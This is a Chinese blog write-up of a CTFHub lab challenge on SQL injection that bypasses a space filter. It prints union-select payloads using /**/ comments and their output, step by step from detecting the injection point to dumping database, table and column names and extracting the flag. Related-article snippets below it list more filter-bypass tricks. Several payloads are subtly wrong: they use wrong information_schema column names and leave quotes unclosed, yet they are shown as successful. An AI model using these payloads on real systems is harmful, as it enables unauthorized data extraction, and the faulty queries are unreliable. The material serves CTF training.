CTFhub-sql注入-绕过空格过滤

最新推荐文章于 2023-08-31 19:18:37 发布
最新推荐文章于 2023-08-31 19:18:37 发布
阅读量348 收藏 1
点赞数
分类专栏: CTF--SQL注入 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ssss39/article/details/132378788
版权

 

常用绕过空格过滤的方法:

/**/、()、%0a

1.判断是否存在sqli注入

1

1/**/union/**/select/**/1=1

1/**/union/**/select/**/1=2

如果1/**/union/**/select/**/1=1的显示结果与1/**/union/**/select/**/1=2的显示结果不一样,

与1的结果一样说明存在注入点

 2

 3 没有回显,说明只用 1,2 这两个

 1/**/union/**/select/**/1,2     没有将数据带出来

修改最前面的注入点:为 -1 等其他数字

-1/**/union/**/select/**/1,2

-1/**/union/**/select/**/1,version()   

查看数据库版本:10.3.22-MariaDB-0+deb10u1

 -1/**/union/**/select/**/1,database()   

报出当前数据库:sqli

 -1/**/union/**/select/**/1,group_concat(schema_name)/**/

from/**/information_schema.schemata

报出所有的数据库:information_schema,mysql,performance_schema,sqli

-1/**/union/**/select/**/1,group_concat(table_name)/**/

from/**/information_schema.tables/**/

where/**/schema_name='sqli

报数据库 sqli 中  表名:news,beskggkoxn

 -1/**/union/**/select/**/1,group_concat(column_name)/**/

from/**/information_schema.columns/**/

where/**/schema_table='beskggkoxn

通过表名:beskggkoxn     报字段名:dzkctujmta

 -1/**/union/**/select/**/1,group_concat(dzkctujmta)/**/

from/**/sqli.beskggkoxn

通过数据库sqli中 数据表beskggkoxn 中的字段名dzkctujmta字段内容:ctfhub{b8947534164e94454cade1e1}

斜躺青年
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
SQL注入技巧之显注与盲注中过滤逗号绕过详析
09-09
SQL注入绕过技巧有很多,下面这篇文章主要给大家介绍了关于SQL注入技巧之显注与盲注中过滤逗号绕过的相关资料,文中通过示例代码介绍的非常详细,需要的朋友们下面随着小编来一起学习学习吧
sql注入空格过滤_CTF小白入门- SQL注入位置发现及绕过
weixin_39945475的博客
11-16 2716
上一篇中介绍了 SQL 注入的各种方式和利用情况。这一篇中介绍注入位置及注入点的发现方法。对内容有不理解的小伙伴或发现错误的小伙伴,可以私信和我联系,共同探讨。如果您喜欢,麻烦点个赞,(づ ̄ 3 ̄)づ常见注入点位置及判断方法在CTF比赛中,注入点一般存在一下几个地方。GET中的注入点 一般这种注入点最容易被发现了,可以用sqlmap或者 手工验证。POS中的注入点 POST参数中的注入点一...
CTF-Web3-(SQL简单过滤绕过)
→_→
07-24 1588
3.简单的sql注入 思路: 检测是否存在注入点的两种常用方法:(更多注入详情:Sqli-labs环境通关教程-学习) 1.基于报错的检测方法 一般这种方法是输入单引号’。看是否报错,如果数据库报错,说明后台数据库处理了我们输入的数据。那么有可能存在注 入点。 2.基于布尔的检测方法---(这只是最基础的判断) 这种方法是输入: 1 and 1=1 ,通常这种情况会正常返回数据 1 and 1=2 ,通常这种情况不会返回数据或者直接报错 或者 1' and '1'='1 ,通常这种.
buuctf 刷题5(sql注入篇)
weixin_63231007的博客
05-10 3890
sql注入挺难的我感觉,但是很重要,有好多绕过,和注入手段需要一步步在尝试,因此本章刷一下buuctf各个sql注入题目,来巩固联系一下自己在sql注入方面的知识。 [极客大挑战 2019]HardSQL 1 输入1',出错,1'#显示不同,存在单引号闭合注入。 order by查字段,union,堆叠注入,和输入数字都烦返回错误 =,空格,和好多关键字都被过滤了。 空格用()绕过,=用like绕过。 尝试报错注入: 1'or(updatexml(1,concat...
CTFHub_技能树_Web之SQL注入——过滤空格
Ho1aAs‘s Blog
12-23 943
文章目录一、过滤空格绕过二、注入过程Ⅰ、爆表名Ⅱ、爆列名Ⅲ、爆flag 一、过滤空格绕过 一般注入语句为 ?id=0 union select database(),user() 由于过滤空格致使无法执行注入的语句时,可使用以下字符代替空格,发挥同样效果 ():一对圆括号 +:加号 %09:TAB换行符的URL编码形式 /**/:块注释符 二、注入过程 依次尝试发现只能使用块注释符替换,那么开始注入: Ⅰ、爆表名 ?id=10/**/union/**/select/**/1,group_conc
CTF之命令执行常见绕过
qq_42383069的博客
04-18 4713
在 linux 下表示分隔符,只有cat$IFSa.txt 的时候, bash 解释器会把整个 IFSa当做变量名,所以导致没有办法运行,然而如果加一个 {} 就固定了变量名,同理在后面加个 $ 可以起到截断的作用,而 $9 指的是当前系统shell 进程的第九个参数的持有者,就是一个空字符串,因此 $9 相当于没有加东西,等于做了一个前后隔离。]有一个重要的区别,当匹配的文件不存在,[…通过测试,可见程序过滤了截断符,根据以上的知识,我们来fuzz一下可用的截断符。根据burp爆破,发现可以通过。
CTFWeb-命令执行漏洞过滤绕过姿势
热门推荐
道阻且长,行则将至。
04-29 1万+
文章目录前言CTF题目绕过姿势命令联合执行关键词的绕过内联执行绕过多种解法变量拼接内联执行Base64编码总结 前言 为了备战(划水)5 月份广东省的 “红帽杯” 网络安全竞赛,继续开始到 BUUCTF 平台练习 CTF 题目。在去年参加的第四届强网杯全国网络安全竞赛中,就遇到过命令执行漏洞绕过的题目 CTF解题-2020年强网杯参赛WriteUp(题目名称 “主动” ),当时采用了 base64 编码联合反引号、变量拼接两种方式绕过了 flag 关键字的过滤并读取了 flag 值: 本文目的在于结合 BU
CTFHub笔记之技能树 WEB:过滤空格
weixin_48799157的博客
03-21 2229
小白一个,如果错误请指正! 首先我们常规的去注入一下,发现之前使用的句子行不通,原因是空格键被过滤掉了。 那我们就得去学习一下怎么绕过空格过滤: SQL注入绕过技巧 - VVVinson - 博客园1.绕过空格(注释符/* */,%a0): 两个空格代替一个空格,用Tab代替空格,%a0=空格: %20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!*/ 最基本的绕过方https://www.cnblogs.com/Vinson404/p...
CTF萌新日记——绕过
qq_45427131的博客
07-19 984
CTF萌新日记——绕过
CTF 代码审计之绕过过滤的空白字符
天泽岁月
08-31 812
ctf空白字符
10-sql注入-mysql注入1
08-03
1.路径符号:要用双斜杠 \\ ,或者 / 2.转换为十六进制数,这样就不需要引号了 1.报错显示 3.遗留文件 phpinfo info test php 5
php登录页面实现-SQL注入
03-07
php登录页面实现-SQL注入
关于SQL注入绕过的一些知识点
09-09
网上关于SQL注入绕过技巧有很多,最近正好空下来,想着整理下关于SQL注入绕过的一些姿势。欢迎大牛补充,下面这篇文章主要介绍了关于SQL注入绕过的一些知识点,总结的还是相对比较全面的,需要的朋友可以参考下。
XCTF-攻防世界CTF平台-Web类——14、supersqli(SQL注入、关键词过滤
Onlyone_1314的博客
11-27 1932
目录标题方法一、堆叠注入1、rename修改表名和alter change修改列名2、rename修改表名和alter add添加列名方法二、handler语句方法三、预编译 打开题目地址 之后搜索:1’ or 1=1# 成功返回了3条数据,说明存在SQL注入漏洞 之后先判断有几列数据,使用order by 1让返回的数据按照第一列排序: 1' or 1=1 order by 1 # 返回了正确的结果,并且按照第一列排序了,说明至少存在一列数据。 其实我们也可以直接从order by 2让返回的数据
CTF_ctfshow_web7_sql注入过滤空格
weixin_54227009的博客
05-14 459
打开靶机 打开每一个列表,发现有一个id,所以为get传参 ok,找一下注入-2/**/union/**/select/**/1,2,3# 这里发现过滤空格,所以直接用/**/代替空格进行绕过,发现回显点为2,3 下面开始查库吧! -2/**/union/**/select/**/1,database(),version();# 库名:web7 版本:10.3.18-MariaDB 查表: -2/**/union/**/select/**/1,gr...
CTF笔记
weixin_51712979的博客
12-15 412
CTF之旅SQL注入判断SQL注入类型1、确定问题参数和漏洞类型2、确定字段数SQL注入一些过滤绕过总结1、过滤关键字2、过滤逗号3、过滤空格4、过滤等号5、过滤大于小于号==updatexml()报错注入====堆叠注入==文件伪协议盲注时间盲注原理简介延迟注入使用到的函数上传漏洞文件上传漏洞常见web漏洞文件包含XSS漏洞代码审计CSRFSSRF命令执行PHP 弱类型 SQL注入 判断SQL注入类型 1、确定问题参数和漏洞类型 可以看到,在URL中,参数为id,当输入1’时报错,当输入1”时正常显示
CTF学习笔记——SQL注入
xuanyulevel6的博客
08-25 4489
以pikachu靶场练习来学习ctf知识
SQL注入的一般方法总结(含WAF绕过) ctf
NLost
03-20 6633
Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器 上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。 下面分享几种常见的SQL注入常见绕过方法:以下以 **index.php?id=1** 为例绕过
ctfhub sql注入
最新发布
10-09
CTFHub是一个CTF(Capture The Flag)竞赛平台,其中包含了各种类型的安全挑战,包括SQL注入。SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以利用它来绕过应用程序的身份验证、访问未授权的数据或执行恶意操作...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

斜躺青年

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值